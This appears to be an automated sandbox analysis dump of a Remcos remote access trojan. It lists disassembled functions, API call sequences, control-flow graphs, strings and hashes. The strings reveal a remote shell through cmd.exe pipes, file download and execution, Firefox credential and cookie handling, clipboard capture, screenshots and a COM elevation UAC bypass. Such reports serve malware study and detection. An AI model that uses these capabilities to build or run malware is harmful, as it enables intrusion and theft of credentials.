• API ID: Process$CloseHandleOpen$FileImageName
• String ID:
• API String ID: 2951400881-0
• Opcode ID: 81942e7addce2a1bdc39bfb83f2669cd8d6753e4bd6c5855ff2ce9cbe7850470
• Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
• Opcode Fuzzy Hash: 81942e7addce2a1bdc39bfb83f2669cd8d6753e4bd6c5855ff2ce9cbe7850470
• Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A

Control-flow Graph
control_flow_graph 765 4137aa-4137c1 RegCreateKeyA 766 4137c3-4137f8 call 40247c call 401fab RegSetValueExA RegCloseKey 765->766 767 4137fa 765->767 769 4137fc-41380a call 401fd8 766->769 767->769
APIs
• RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
• RegSetValueExA.KERNELBASE(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000), ref: 004137E1
• RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000,?,00408798,00000001), ref: 004137EC
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: Control Panel\Desktop
• API String ID: 1818849710-27424756
• Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
• Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
• Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
• Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54

Control-flow Graph
control_flow_graph 783 4485e6-4485fa 784 448607-448622 LoadLibraryExW 783->784 785 4485fc-448605 783->785 787 448624-44862d GetLastError 784->787 788 44864b-448651 784->788 786 44865e-448660 785->786 789 44863c 787->789 790 44862f-44863a LoadLibraryExW 787->790 791 448653-448654 FreeLibrary 788->791 792 44865a 788->792 793 44863e-448640 789->793 790->793 791->792 794 44865c-44865d 792->794 793->788 795 448642-448649 793->795 794->786 795->794
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
• GetLastError.KERNEL32(?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
• Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
• Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
• Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC

Control-flow Graph
control_flow_graph 796 41c516-41c53a CreateFileW 797 41c540-41c571 GetFileSize call 40244e call 401fab ReadFile 796->797 798 41c53c-41c53e 796->798 804 41c573 797->804 805 41c575-41c57c CloseHandle 797->805 799 41c57e-41c582 798->799 804->805 805->799
APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
• GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C543
• ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C568
• CloseHandle.KERNELBASE(00000000,?,00000000,0040412F,00465E84), ref: 0041C576
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleReadSize
• String ID:
• API String ID: 3919263394-0
• Opcode ID: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
• Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
• Opcode Fuzzy Hash: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
• Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139

Control-flow Graph
control_flow_graph 806 40d0a4-40d0d0 call 401fab CreateMutexA GetLastError
APIs
• CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
• GetLastError.KERNEL32 ref: 0040D0BE
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: CreateErrorLastMutex
• String ID: SG
• API String ID: 1925916568-3189917014
• Opcode ID: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
• Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
• Opcode Fuzzy Hash: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
• Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
APIs
• RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00413605
• RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00413622
• RegCloseKey.KERNELBASE(?), ref: 0041362D
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 859e64f62c27df18338a46db6ec3b0787647947da56704c1ae6da14bd80b9033
• Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
• Opcode Fuzzy Hash: 859e64f62c27df18338a46db6ec3b0787647947da56704c1ae6da14bd80b9033
• Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
APIs
• RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00000000), ref: 004135A4
• RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004135C2
• RegCloseKey.ADVAPI32(00000000), ref: 004135CD
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
• Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
• Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
• Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
APIs
• RegOpenKeyExW.KERNELBASE(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
• RegQueryValueExW.KERNELBASE(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
• RegCloseKey.KERNELBASE(?), ref: 004136A0
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 65d225e62495b603b94ecda2ada9fe67bc436a3b870d946b60a27cc720c1bdd3
• Instruction ID: b2ddc0a972744091932d43abea1e646d3cdf78111d27e2b843060007377f7c4f
                                                                                                                                                • Opcode Fuzzy Hash: 65d225e62495b603b94ecda2ada9fe67bc436a3b870d946b60a27cc720c1bdd3
                                                                                                                                                • Instruction Fuzzy Hash: B7F04F75600218FBDF209B90DC05FDD7B7CEB04B15F1040A2BA45B5291DB749F949BA8
                                                                                                                                                APIs
                                                                                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                                • RegSetValueExA.KERNELBASE(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                                                                                                • RegCloseKey.KERNELBASE(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseCreateValue
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1818849710-0
                                                                                                                                                • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                                                • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                                                                                                • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                                                • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                                                                                                APIs
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004485AA
                                                                                                                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2279764990-0
                                                                                                                                                • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                                                                                • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                                                                                                                • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                                                                                • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                                                                                • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                                                                                                • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                                                                                • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                                                                                                APIs
                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000), ref: 00445BB5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                • Opcode ID: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                                                                                                                • Instruction ID: ef76d3429b2572ee2e16b707a9c356192af24cfd4e901c13b73aaad13af6506a
                                                                                                                                                • Opcode Fuzzy Hash: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                                                                                                                • Instruction Fuzzy Hash: BEF0B431500F65ABBF222E22AC05E5B3769DB81770B14412BB914EA286CA38FC0186AC
                                                                                                                                                APIs
                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                                                                • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                                                                                                • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                                                                • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                                                                                                                APIs
                                                                                                                                                • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Deallocatestd::_
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1323251999-0
                                                                                                                                                • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                                • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                                                                                                • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                                • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                                                                                                APIs
                                                                                                                                                • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                                                                                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                                                                                                  • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                                                                                                                                  • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                                                                                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                                                                                                                                  • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                                                                                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                                                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                                                                                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                                                                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                                                                                                  • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                                                                                                  • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                                                                  • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                                                                  • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                                                                • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                                                                                                • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                                                                                                                                  • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                                                                • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                                                                                                • API String ID: 1067849700-181434739
                                                                                                                                                • Opcode ID: f0bb3cb5b26e90024f3fd42e5bc2004f602a4fcf380aa8fd0aaf15a6088bcc68
                                                                                                                                                • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                                                                                                                • Opcode Fuzzy Hash: f0bb3cb5b26e90024f3fd42e5bc2004f602a4fcf380aa8fd0aaf15a6088bcc68
                                                                                                                                                • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                                                                                                                APIs
                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                                                                                • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
• CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
• Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
• PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
• ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
• WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
• Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
• TerminateProcess.KERNEL32(00000000), ref: 00405A17
• CloseHandle.KERNEL32 ref: 00405A23
• CloseHandle.KERNEL32 ref: 00405A2B
• CloseHandle.KERNEL32 ref: 00405A3D
• CloseHandle.KERNEL32 ref: 00405A45
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
• String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
• API String ID: 2994406822-18413064
APIs
• GetCurrentProcessId.KERNEL32 ref: 00412141
  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
  • Part of subcall function 004138B2: RegSetValueExA.KERNELBASE(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
  • Part of subcall function 004138B2: RegCloseKey.KERNELBASE(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
• OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
• CloseHandle.KERNEL32(00000000), ref: 00412190
• CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
• OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
• String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
• API String ID: 3018269243-13974260
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
• FindClose.KERNEL32(00000000), ref: 0040BC04
• FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
• FindClose.KERNEL32(00000000), ref: 0040BD4D
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
• API String ID: 1164774033-3681987949
APIs
• OpenClipboard.USER32 ref: 004168FD
• EmptyClipboard.USER32 ref: 0041690B
• GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
• GlobalLock.KERNEL32(00000000), ref: 00416934
• GlobalUnlock.KERNEL32(00000000), ref: 0041696A
• SetClipboardData.USER32(0000000D,00000000), ref: 00416973
• CloseClipboard.USER32 ref: 00416990
• OpenClipboard.USER32 ref: 00416997
• GetClipboardData.USER32(0000000D), ref: 004169A7
• GlobalLock.KERNEL32(00000000), ref: 004169B0
• GlobalUnlock.KERNEL32(00000000), ref: 004169B9
• CloseClipboard.USER32 ref: 004169BF
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
• String ID: !D@
• API String ID: 3520204547-604454484
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
• FindClose.KERNEL32(00000000), ref: 0040BE04
• FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
• FindClose.KERNEL32(00000000), ref: 0040BEEA
• FindClose.KERNEL32(00000000), ref: 0040BF0B
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: Find$Close$File$FirstNext
• String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
• API String ID: 3527384056-432212279
APIs
• __EH_prolog.LIBCMT ref: 0041A04A
• GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
• Sleep.KERNEL32(000003E8), ref: 0041A18E
• GetLocalTime.KERNEL32(?), ref: 0041A196
• Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
• String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
• API String ID: 489098229-1431523004
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$1$2$3$4$5$6$7$VG
• API String ID: 0-1861860590
APIs
• _wcslen.LIBCMT ref: 0040755C
• CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: Object_wcslen
• String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
• API String ID: 240030777-3166923314

APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
• GetLastError.KERNEL32 ref: 0041A84C
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: EnumServicesStatus$ErrorLastManagerOpen
• String ID:
